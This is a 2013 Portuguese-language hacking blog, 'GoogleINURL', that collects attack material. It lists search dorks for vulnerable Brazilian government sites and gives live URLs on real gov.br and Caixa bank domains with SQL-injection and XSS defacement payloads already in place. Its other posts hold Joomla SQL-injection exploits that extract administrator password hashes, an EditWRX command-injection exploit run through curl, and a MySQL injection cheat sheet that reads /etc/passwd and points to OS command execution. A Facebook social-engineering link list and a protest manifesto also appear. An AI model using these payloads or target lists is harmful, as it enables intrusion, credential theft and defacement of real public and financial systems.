Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sexta-feira, 30 de agosto de 2013

GoogleINURL no face, últimas postagens

GoogleINURL no face

quarta-feira, 28 de agosto de 2013

PROJETO INURLPHP usando motor de busca do GOOGLE.

PROJETO INURLPHP usando motor de busca do GOOGLE.
FASE[01]

PROJETO BOTPHP usando motor de busca do GOOGLE. FAZE01
 FASE[02]
PROJETO BOTPHP usando motor de busca do GOOGLE. FAZE02

DORK buscar erros em sites de prefeituras


DORK buscar erros em sites de prefeituras

DORK: site:gov.br +(error) mysql (prefeitura) ext:asp -pdf

Resultados:

http://www3.prefeitura.sp.gov.br/cadlem/secretarias/negocios_juridicos/cadlem/integra.asp?%20alt=25042003P%20000352003SVMA%20%20%20%20%20%20%20%20&secr=87&depto=0&descr_tipo=PORTARIA


http://www.praiagrande.sp.gov.br/pgnoticias/noticias/noticia_01.asp?cod=14616'&cd_categoria=

http://smaonline.rio.rj.gov.br/sistemas/SCS/WPLTO/noticia_detalhada_free.asp?index=460'

http://www2.seplag.ce.gov.br/premio/projetos_filtro_detalhes_2011.asp?cdProjeto=262'



http://www.lajeado.rs.gov.br/download_anexo/index.asp?strARQUIVO=http://blog.inurl.com.br&strdescricao=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--


http://www.portoalegre.rs.gov.br/noticias/ver_imprimir.asp?m1=21931'

http://www.carauari.am.gov.br/portal1/municipio/noticia.asp?iIdMun=100113017'&iIdNoticia=219764


http://www.proderj.rj.gov.br/artigo_completo.asp?ident=23'

http://www.praiagrande.sp.gov.br/Praiagrande/noticia_01.asp?cod=14616'&cd_categoria=

http://www.internetcomunitaria.rj.gov.br/detalhe_noticia.asp?ident=-31


http://ww1.saojoao.sp.gov.br/compras/locaweb_resultadoitens.asp?Modalidade=1&Numero=1068&Ano=2011&Fornecedor=3414&DscFornecedor=%3Cdiv%20style=%22padding:50px;5px;0px;0px;%22%3E%3Cimg%20src=%22http://1.bp.blogspot.com/-UO00Uv2mkDU/UeWWrU1yRlI/AAAAAAAACik/RWAixxyctZ0/s1600/1062380_475164299242951_1939178094_n.jpg%22/%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C/br%3E%3C!--&DscMod=COTA%C7%C3O%20DE%20SERVI%C7OS

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

Joomla com_sectionex v2.5.96 SQL Injection vulnerabilidade

DORK:site:bo inurl:/index.php?option=com_sectionex
DORK:site:br inurl:/index.php?option=com_sectionex

[1] parâmetro "filter_order":

URL /index.php?option=com_sectionex&view=category&id=X(INT)&Itemid=Y(INT)

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
dual)%23&filter_order_Dir=DESC


[2] parâmetro "filter_order_Dir":

EXEMPLO:
http://www.lapaz.bo/index.php?option=com_sectionex&view=category&id=143&Itemid=777

EXPLOIT:POST-> filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23

segunda-feira, 26 de agosto de 2013

EditWRX CMS Executar codico remotamente + Admin Bypass Zero Day!

EditWRX é vulnerável a execução de código remoto através da falta de filtro function
open() no downloader, que pode ler em comandos canalizados na GET "download" Apesar do downloader ser um componente administrativo, O login Não é necessário para executar  a função.


DORK: +inurl:editwrx/wrx.cgi
Exploit: ?download=;uname%20-a| 

Exemplo de uso:
curl "http://sitevull.com/editwrx/wrx.cgi?download=;uname%20-a|"

terça-feira, 20 de agosto de 2013

A CAIXA TA MUITO ZUEIRA

O CAIXA TA MUITO ZUEIRO



http://www1.caixa.gov.br/imprensa/busca_resultado.asp?palavra=%3Cmarquee%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBIG%3E%3CBR%3EGOOGLEINURL%3CBR%3EVEMPRARUA%3C/marquee%3E&sltEditoria=0&txtDiaI&txtMesI&txtAnoI&txtDiaF&txtMesF&txtAnoF&dtaInicial&dtaFinal&dtaLimite=01%2F01%2F1900&dscTipNoticia  XSS


http://conectividade.caixa.gov.br/registro/filtroerro.jsp?msgerro=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E&erroprog&tituloerro=Erro XSS



https://www5.caixa.gov.br/fornecedores/pregao_internet/asp/compartilhadas/frm_consulta_regiao.asp?sLnkPagina=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F
%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E XSS



http://www1.caixa.gov.br/download/asp/ent_hist.asp?download= GET


http://www1.caixa.gov.br/imprensa/noticias/asp/popup_box.asp?codigo=7013095' GET

http://www1.caixa.gov.br/imprensa/noticias/asp/popup.asp?codigo=7013095' GET



http://mcmv.caixa.gov.br/xmlrpc.php



http://www1.caixa.gov.br/download/asp/download.asp?subCategId=198'&CategId=65&subCateglayout=Manuais&Categlayout=Cobran%E7a%20Caixa%20%96%20SICOB GET



http://www5.caixa.gov.br/fornecedores/licitacoes/asp/editalc.asp?ed=7855.01.1048.0'/2005&gisup=BR GET



https://expressoparceiros.caixa.gov.br/login.php?cd=10&phpgw_forward=%2Fnews_admin%2Findex.php

http://www1.caixa.gov.br/gov/_includes/path_upload.asp


https://webp.caixa.gov.br/urbanizacao/siurbn/acompanhamento/ac_publico/sistema/_includes/rel_alerta.asp?codTitulo=1&strMensagem=%3Ccenter%3E%3Cfont+size%3D%2250px%22+%3EATIVISMO+NACIONAL%3C%2Ffont%3E%3Cbr%3E%3Ca+href%3D%22https%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%22%3Ehttps%3A%2F%2Fwww.facebook.com%2FAtivismoNacional%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Ffbcdn-sphotos-a-a.akamaihd.net%2Fhphotos-ak-frc3%2F1149511_154022918127275_1790780600_o.jpg%22%3E



http://webcache.googleusercontent.com/search?q=cache:4xP1WubO9MMJ:www1.caixa.gov.br/loterias/_includes/_inc_resultado_de_ontem.asp+&cd=14&hl=pt-BR&ct=clnk&gl=br

SELECT * FROM ( SELECT '2' AS CODIGO, '3' AS ORDEM, 'Lotomania:' AS MODALIDADE, CO_CONCURSO, DE_RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DT_APURACAO) AS "DIA" FROM LOTTB003_LOTOMANIA WHERE CO_CONCURSO = (SELECT MAX(CO_CONCURSO) FROM LOTTB003_LOTOMANIA) UNION SELECT '3' AS CODIGO, '1' AS ORDEM, 'Quina:' AS MODALIDADE, CONCURSO, RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM QUINA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM QUINA) UNION SELECT '4' AS CODIGO, '2' AS ORDEM, 'Mega-Sena:' AS MODALIDADE, CONCURSO, RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM MEGASENA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM MEGASENA) UNION SELECT '8' AS CODIGO, '4' AS ORDEM, 'Dupla-Sena:' AS MODALIDADE, CONCURSO, RESULTADO_SORTEIO1 + '-' + RESULTADO_SORTEIO2 AS RESULTADO1, DATEPART(WEEKDAY,DATA) AS "DIA" FROM LOTTB030_DUPLASENA WHERE CONCURSO = (SELECT MAX(CONCURSO) FROM LOTTB030_DUPLASENA) UNION SELECT '11' AS CODIGO, '5' AS ORDEM, 'Lotofácil:' AS MODALIDADE, NU_CONCURSO, DE_RESULTADO AS RESULTADO1, DATEPART(WEEKDAY,DT_APURACAO) AS "DIA" FROM LOTTB035_LOTOFACIL WHERE NU_CONCURSO = (SELECT MAX(NU_CONCURSO) FROM LOTTB035_LOTOFACIL)) AS GERAL WHERE GERAL.CODIGO IN (SELECT C.CO_MODALIDADE FROM LOTTB015_DIA_SEMANA A, LOTTB017_SORTEIO B, LOTTB016_MODALIDADE C WHERE A.CO_DIA_SEMANA = B.CO_DIA_SEMANA AND B.CO_MODALIDADE = C.CO_MODALIDADE AND A.CO_DIA_SEMANA = ( SELECT DIASEMANA = CASE WHEN DATEPART(WEEKDAY,GETDATE()) = 2 THEN DATEPART(WEEKDAY,(GETDATE())-2) ELSE DATEPART(WEEKDAY,(GETDATE())-1) END ) )ORDER BY ORDEM


O ITAÚ TA MUITO ZUEIRO

O ITAÚ TA MUITO ZUEIRO

O BRADESCO TA MUITO ZUEIRO!

O BRADESCO TA MUITO ZUEIRO




quarta-feira, 14 de agosto de 2013

Joomla Hacking - Exploits

Joomla hacking





 ~Generic version family ....... [1.5.x]

~1.5.x htaccess.txt revealed [1.5.4 - 1.5.14]
~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts.
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id= 60&Itemid=99999+UNION+SELECT+1,concat(0x1e,userna m e,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FRO M+jos_users+where+usertype=0x53757065722041646d696 e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%2 2%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: com_admin File Inclusion Vulnerability
Versions Affected: N/A
Check: /administrator/components/com_admin/admin.admin.html.php
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
Vulnerable? No

# 24
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=55 0513+and+1=2+union+select+concat(username,char(58) ,password)+from+jos_users+where+usertype=0x5375706 5722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 25
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 26
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 27
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 28
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 29
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 30
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 31
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? No

# 32
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 33
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosms g=DOS@HERE<<>AAA<><>
Vulnerable? No

# 34
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&i d=0'+and+'1'='2
Vulnerable? No

# 35
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 36
Info -> Component: JCE XSS+File Inclusion Vulnerability
Versions Affected: 1.0.4<=
Check: /components/com_jce/
Exploit: 1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources.
Vulnerable? No

# 37
Info -> Component: com_k2 (sectionid) SQL Injection Vulnerability
Versions effected: 1.0.1 Beta <=
Check: /components/com_k2/
Exploit: /index.php?option=com_k2&view=itemlist&category=nul l'+and+1=2+union+select+1,concat(username,0x3a,pas sword),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users +where+usertype=0x53757065722041646d696e6973747261 746f72--
Vulnerable? No

# 38
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 39
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&fee did=-1%20union%20select%201,concat%28username,char%2858 %29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from% 20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&fee did=-1%20union%20select%201,concat%28username,char%2858 %29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from% 20jos_users--
Vulnerable? No

# 40
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 41
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&ci d[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&ci d[]=1'+and+1=1+--+
Vulnerable? N/A

terça-feira, 13 de agosto de 2013

Dork's de vândalos, dorks buscam possíveis injeções de SQL nas URL

Dork's de vândalos.

Dork's de vândalos.


Essas dorks buscam possíveis injeções de SQL nas URL digamos.
DORK="gov" inurl:"UNION ALL SELECT 1,2,"

http://URLENCONTRARA.gov/ARQUIVO.PHPouASP?GET=[DORK]*


Exemplo de achado:
http://www.londonbritaintownship-pa.gov/newsDetail.php?recordID=-19+union+all+select+1,2,user(),version(),5,6,7,8,9--


OUTRAS DORKS DO MESMO PADRÃO

"gov" inurl:"UNION ALL SELECT 1,2,"
inurl:"UNION ALL SELECT 1" concat
site:br inurl:"UNION ALL SELECT 1" concat

segunda-feira, 5 de agosto de 2013

Comandos MYSQL


Comandos MYSQL

Comandos MYSQL

Version SELECT @@version
Comments SELECT 1; #comment
SELECT /*comment*/1;
Current User SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password Hashes SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Current Database SELECT database()
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’
Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c
Bitwise AND SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);
String Concatenation SELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC
If Statement SELECT if(1=1,’foo’,'bar’); — returns ‘foo’
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A
Avoiding Quotes SELECT 0×414243; # returns ABC
Time Delay SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution If mysqld (<5 .0="" .so="" a="" account="" and="" as="" by="" can="" commands="" compromise="" contain="" dba="" defined="" execute="" file="" function="" href="http://www.0xdeadbeef.info/exploits/raptor_udf.c" into="" is="" lib="" nbsp="" object="" or="" os="" root="" running="" shared="" should="" similar="" the="" uploading="" user="" usr="" you="">raptor_udf.c
explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform. Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system Hostname, IP Address SELECT @@hostname; Create Users CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv Delete Users DROP USER test1; — priv Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv Location of DB files SELECT @@datadir; Default/System Databases information_schema (>= mysql 5.0)
mysql

terça-feira, 30 de julho de 2013

Dork SWFUpload xss Wordpress.

Dork SWFUpload  XSS Wordpress.


Dork SWFUpload  xss Wordpress.

SWFUpload é uma biblioteca JavaScript que envolve a função de upload do Flash Player. Traz seus uploads para o próximo nível com lima múltipla escolha, Upload Progress e do lado do cliente Tamanho do Arquivo Verificação.

Ao contrário de outras ferramentas de upload em Flash, SWFUpload deixa a UI nas mãos do desenvolvedor. Usando um conjunto de manipuladores de eventos de exibição desenvolvedores podem fazer upload de seu próprio progresso e status para o usuário em HTML / CSS UI.






DORK: site:.gov.br  +inurl:wp-includes/js/swfupload/

Exemplo: 

site:Domínio   +inurl:wp-includes/js/swfupload/

quinta-feira, 25 de julho de 2013

MANIFESTO NACIONAL APOIO AOS IRMÃOS E IRMÃS CARIOCAS!



APOIO AOS IRMÃOS E IRMÃS CARIOCAS!

Este é o maior medo de governos corruptos, a união!

Querem semear a discórdia no movimento, dividir-nos, colocar-nos uns contra os outros. E nós respondemos: somos diferentes, somos muitos e estamos juntos.

Durante os protestos ocorridos nessa segunda feira dia 22 no Rio de Janeiro, que foram motivados pelos altos gastos do dinheiro publico com a vinda do Papa para o Brasil, os manifestantes sofreram forte repressão policial, foram cercados, atacados, criminalizados e a mídia que fazia a cobertura do evento foi fortemente repreendida e caçada em meio aos manifestantes.

Calar é Consentir! Omitir-se é Concordar! Ignorar é Incentivar Ataques!

Se essa era a deixa que precisávamos para voltarmos em peso para rua não vamos deixar isto passar.
Evento Nacional escolha seu estado ou cidade e vá á luta:

https://www.facebook.com/events/393661884073779/

“Se você não for cuidadoso, os jornais farão você odiar as pessoas que estão sendo oprimidas, e amar as pessoas que estão oprimindo.” ~ Malcolm X

quinta-feira, 11 de julho de 2013

Engenharia social no facebook.


Ótimo no campo da engenharia social, envio de mensagem para o Facebook via algum aparelho celular ou App.

Ótimo no campo da engenharia social, envio de mensagem para o Facebook via algum aparelho celular ou App.


//via Faсebook for Nokia https://m.facebook.com/dialog/feed?app_id=135645916447772&display=wap&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&_rdr

//via Nokia X6 Smartphone https://m.facebook.com/dialog/feed?app_id=119421234761587&display=wap&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&_rdr

//via Faсebook for Sony Ericsson https://m.facebook.com/dialog/feed?app_id=128501417181134&display=wap&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&_rdr

//via Loading... ◥◣◥◣◥◣◥◣ https://m.facebook.com/dialog/feed?display=touch&redirect_uri=http%3A%2F%2Fm.facebook.com%2F%3F_rdr&app_id=a4bd8ff95d074aa860ba4461af04f002&_rdr

//IPHONE https://m.facebook.com/dialog/feed?display=touch&redirect_uri=http%3A%2F%2Fm.facebook.com%2F%3F_rdr&app_id=0726e0c1222fa775ae66c0fbde767934&_rdr

//IPHONE 2 https://m.facebook.com/dialog/feed?app_id=291461757558718&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&display=touch&_rdr

//GALAXY https://m.facebook.com/dialog/feed?app_id=112059618886061&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&display=touch&refid=52&_rdr

//BACK TRACK https://m.facebook.com/dialog/feed?app_id=125544804140163&display=wap&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&_rdr

//via aNak ComUnity RT:02 RW:03 SUGIO https://m.facebook.com/dialog/feed?_path=feed&app_id=313061175376233&redirect_uri=https%3A%2F%2Fwww.facebook.com&display=touch&refid=0&from_login=1&refsrc=http%3A%2F%2Fm.facebook.com%2Fcheckpoint%2F&m_sess=soAq1mZD-7jHFhApO&_rdr

//I LOVE INDONESIA https://m.facebook.com/dialog/feed?app_id=136728433102466&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&display=touch&_rdr

//via ErRnY HidAyATtii eaa https://m.facebook.com/dialog/feed?_path=feed&app_id=304374462909178&redirect_uri=https%3A%2F%2Fwww.facebook.com&display=touch&refid=0&from_login=1&refsrc=http%3A%2F%2Fm.facebook.com%2Fcheckpoint%2F&m_sess=soAq1mZD-7jHFhApO&_rdr

//via Komputer Sim Kuring Nu Pang Hadena https://m.facebook.com/dialog/feed?display=touch&redirect_uri=http%3A%2F%2Fm.facebook.com%2F%3F_rdr&app_id=2ca73df25230739af48eb23aef578ffb&_rdr

//via Android SDK Stream Example https://m.facebook.com/dialog/feed?redirect_uri=fbconnect://success&app_id=126642314059639&display=touch

//via BlackBerry Worldwide https://m.facebook.com/dialog/feed?app_id=167301526702546&redirect_uri=http%3A%2F%2Fm.facebook.com%2F&display=touch&refid=52&_rdr

Dork: site:m.facebook.com/dialog/feed?_path=feed&app_id= phone

quarta-feira, 10 de julho de 2013

